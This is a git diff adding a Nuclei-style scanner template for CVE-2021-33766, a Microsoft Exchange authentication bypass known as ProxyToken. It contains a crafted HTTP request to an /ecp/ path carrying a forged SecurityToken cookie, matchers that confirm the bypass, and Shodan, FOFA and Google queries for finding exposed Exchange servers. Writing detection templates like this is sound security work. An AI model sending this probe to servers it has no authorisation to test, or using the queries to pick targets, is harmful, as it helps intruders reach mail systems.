diff --git a/http/cves/2021/CVE-2021-33766.yaml b/http/cves/2021/CVE-2021-33766.yaml new file mode 100644 index 000000000000..e43a433b60cf --- /dev/null +++ b/http/cves/2021/CVE-2021-33766.yaml @@ -0,0 +1,64 @@ +id: CVE-2021-33766 + +info: + name: Microsoft Exchange - Authentication Bypass + author: daffainfo + severity: high + description: | + Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal. + reference: + - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766 + - https://www.zerodayinitiative.com/advisories/ZDI-21-798/ + - https://github.com/demossl/CVE-2021-33766-ProxyToken + - https://nvd.nist.gov/vuln/detail/CVE-2021-33766 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2021-33766 + cwe-id: NVD-CWE-noinfo + cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: microsoft + product: exchange_server + shodan-query: + - vuln:cve-2021-26855 + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 + google-query: intitle:"outlook" + tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev + +variables: + email: "{{randstr}}@{{rand_base(5)}}.com" + +http: + - raw: + - | + GET /ecp/{{email}}/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1 + Host: {{Hostname}} + Cookie: SecurityToken=x + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '403' + - 'function signOut() {' + condition: and + + - type: word + part: header + words: + - "Microsoft.Exchange.Data.Storage.ObjectNotFoundException" + - "X-BEResource=" + condition: and + + - type: status + status: + - 403